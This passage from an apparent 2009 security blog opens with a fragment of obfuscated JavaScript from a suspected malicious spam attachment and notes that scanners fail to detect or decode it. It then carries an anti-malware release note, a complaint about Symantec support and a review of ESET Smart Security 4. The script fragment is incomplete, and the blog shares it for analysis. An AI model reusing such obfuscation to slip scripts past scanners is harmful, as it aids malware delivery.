var scies=(0.8<=.909?longa:9739);
var labori=(0.870,1);
return (1,sciat)
function edocet(nervis,fire,hortum,metae)
var sciat=(2e0,tangit);
var lippie;
var scies=("7e0">=61?6567.:longa);
var labori=(.265,1);
return ('0.77'<821?sciat:8.)
function bolam(aether,locos,stupet,exeant)

Sadly, detection for it at VT is non-existent;

And Wepawet couldn't seem to work with it either.

At the time of writing, I've got Malzilla trying to decode it, but it's taking it's time (been running over 10 mins pinching CPU usage of around 80%). If it ever finishes, I'll post the results.

/edit 13-05-2009 01:51

3 more e-mails received in the last 15 mins, and seems they've got a new domain, (also added to the list above), same IP as the rest though. The sender of the latest 3 are also new, (

a-squared Anti-Malware 4.5 released!

a-squared Anti-Malware 4.5 released!

We've made a lot of improvements since the initial 4.0 release that we want to bundle in a new 4.5 release now.

What's new in a-squared Anti-Malware 4.5?

We have significantly improved the surf protection usability. Users told us that there are too many annoying popups, but the alerted hosts are really suspicious. So we extended the popup box with 3 more small buttons. The first one allows you to block a specific host permanently with one click. No need to go manually to the settings anymore and add a new block rule for a host. Others told us that a-squared has blocked a host that they need (e.g. specific advertising redirect hosts). That's why we have added another button to permanently allow a specific host with one click. The third button allows you to access the surf protection settings quickly. Additionally, the small host blocker popups that hide after 20 seconds got a transparend fade out that indicates that it will hide automatically. When you move your mouse over the half transparend window, it switches to no transparency until you move out of the window again.

a-squared Anti-Malware 4.5 has got some additional false alert filter layers. Signed files from trusted software vendors are no longer alerted by the behavior blocker (Malware-IDS). Combined with the community based alert reduction and whitelists, a-squared Anti-Malware is extremely silent compared with previous versions. But real malware is still detected on a very high quality level.

Windows Security Center integration. Windows XP and Vista now recognize a-squared Anti-Malware as a full antivirus software.

Fine tuning & bugfixes: In general we've made tons of little improvements and fixes. Just to mention a few examples of bugs that some users reported in the past: Scanner stops and crashes have been fixed, script files and others are scanned on execution now, etc.

Read more and download!

Monday, 11 May 2009

Symantec charges $99 to remove WinPatrol "virus" (aka Symantec rips off customer)

Just when you thought Symantec couldn't get any worse - we see this. A Symantec rep by the name of "Rahul", decided that WinPatrol's helping to remove malware from the users system, was enough to consider WinPatrol itself, as a virus, and duly removed it for the customer - charging $99 for the privilege.

Recent behaviour by Symantec, such as partnering with a known malware vendor (, and yet another one of Symantec's "reps" claiming they could not provide additional security without incorporating the Ask crapware, has shown not only that their reps are in dire need of either firing or re-training, but that Symantec themselves are now so focused on the all mighty dollar, that they really don't care about ethics or indeed, their customers security anymore.

This latest issue with WinPatrol is absolutely beyond belief, and as Bill himself says, is completely unacceptable behaviour for an alledged security company (not even McAfee are this bad - and they've got one of the worst AV's available).

Read more on this over at Bills blog;

And if you're a Symantec customer, I'd strongly urge you to ditch them as soon as possible, and switch to a more ethical vendor.


Symantec's "KhanhT" talking bollocks

Symantec - we knew they weren't trustworthy, but this is a new low

Symantec Support Gone Rogue?

Symantec, what are you doing?

Wednesday, 6 May 2009

Follow The Bouncing Malware: Gone With the WINS

They do. But don't try it. Really. This means you. Yes you. Don't look at me like that. You know that you're just sitting there, fighting the urge to go try it-- acting all nonchalant, like you don't care. It's slowly eating away at you. We both know that you're trying to think of something... anything else... just to keep your mind off of wanting to rip the nearest USB cable out its jack so you can go check to see if I'm telling you the truth. But I am. I am. Would I lie to you?

It Happened One Night

At this point in most of the other FTBM postings, I would-- in a rare display of lucidity--take a moment to step aside from my normally disjointed prose to warn you, my dear reader, of the perils of embarking on any attempt to "play around" with the malicious code we're about to examine. Having discovered, over these many years, that none of you actually pay one damn bit of attention to what I say, I've decided to say "t'hell with it..." Have fun! Launch the malware! Run with scissors! Play with matches! Swim right after eating! Don't wear clean underwear, you'll never be in an accident! Your mother was WRONG!

Read the full article


For those that have not yet read the FTBM series, below are links to each edition.

FTBM - Part I -
FTBM - Part II -
FTBM - Part III -
FTBM - Part IV -
FTBM - Part V -
FTBM - Part VI -
FTBM - Part VII -
FTBM - Part VIII -
FTBM - Part IX -
FTBM - Part IX -
FTBM - Part XI -

Tom's website

The Tom Liston Fanclub

NOD32 ESS: 2 months on ....

I was graciously given a licence at the beginning of March in order to review the latest release, and thought I'd give an update on how it is doing.

Although it's got several major good points, such as being very low on resource usage, and popping up to notify me when an application changes (top left), it does have one or two niggles that are frustrating.

First and foremost, if you are using Outlook and have rules configured - be prepared to have them messed with. For example, I've got several rules configured to auto-filter certain phishing scams, so they're auto-forwarded to PhishTank. Sadly, whilst the e-mails are certainly still forwarded - NOD32 has decided it best not to leave them in the folder I told the rule to put them into, but is instead, moving them to the Junk and/or Inbox folder - very annoying (especially given the amount I receive).

The second issue is also with Outlook and at this point, it's a little confusing to say the least. When opening an e-mail, Outlook quite rightly marks it as read. However, I'm frequently seeing these e-mails revert back to unread status - something it never used to do before NOD32 was installed.

The third and final Outlook related issue, is with the speed in which e-mails are sent, downloaded and opened - unfortunately this speed has been greatly reduced, with 1MB of e-mails frequently taking upto and over 10 mins to download, whereas it was usually done within seconds.

These issues however, whilst annoying, are minor. One thing that I'd like to see (and it could be that there is an option, but if there is - I've not found it, and I've spent a considerable amount of time looking), is the ability to stop NOD32 adding it's tagline to every single e-mail.

One of the features I do like most, is it's quarantine dialog. When I am researching malware or malicious sites, and NOD flags it, it automatically stops the connection and/or quarantines the file for me. One rather annoying niggle with this feature, is that it doesn't have an option to ask me what I want to do with it prior to it's taking action (and again, I've been through the options and if it is there, I've not found it). I'd personally like to see NOD ask me what I want to do with the file and/or connection (in the case of malicious websites), and perhaps a little checkbox so I can tell it not to ask me again.

One bug I have found, is it's firewall log viewer. Unless your log is on the small side, you are going to find yourself looking at a "Loading firewall log" dialog, not a bug in itself, but it's cancel button does not seem to work (if I click cancel, it does indeed go away - but sporadically (not always) comes back again as soon as I try doing anything else, such as switching to a different part of the program).

Without a doubt, one of it's best features, besides the rescue CD creation, is the SysInspector, that allows you to create snapshots of the system state. Sadly, something they forgot to do, is prevent you accidentally starting the process twice (just done that myself whilst writing this, as it didn't start creating it the first time, so thought I'd clicked cancel instead). You also cannot cancel one of them whilst they're generating the snapshot - something I'd like to see added.

Bear in mind, your system WILL slow to a crawl whilst it's generating the snapshot, so make sure you're not in the middle of something when you create one (only took around 15 mins on this system (500Mhz, 320MB Ram), not exactly a long time.

One thing this could do with, is a simple "before - current" view, as the current options simply aren't intuitive enough. They need to provide a view here, much like most comparison programs do. An additional option would be advantageous, to have it filter so you can see what was added, and when - and only show that information (would greatly reduce the time required for analysis).

Other than the afformentioned however, the SysInspector provides an extensive amount of information on the systems state, so is definately a welcome addition to the program.

Sadly, one area it is failing in, is detections. Although I've not done a detailed test to date, I do research and analyse malware quite frequently, and sadly, whilst NOD does flag some of it - it misses the majority of it (some aren't detected by anyone, so this is to be expected, but some of it has quite good detections according to VirusTotal). Detailed testing and analysis would be required before detection capability could be properly and responsibly reported - something I'm planning to do in future.

All in all, Eset Smart Security 4, is proving to be an invaluable product, and a major improvement over it's previous incarnations. If detections are drastically improved, this could very well be the best of the best.

Please do bear in mind, that the information provided are my own findings. I am not reviewing NOD32 under the usual test lab conditions, but instead have it on my development "every day" machine (figured it best to test it under real world "every day" conditions). I do not consider myself an expert, so this should not be taken as an expert review.


Eset Smart Security 4: A first look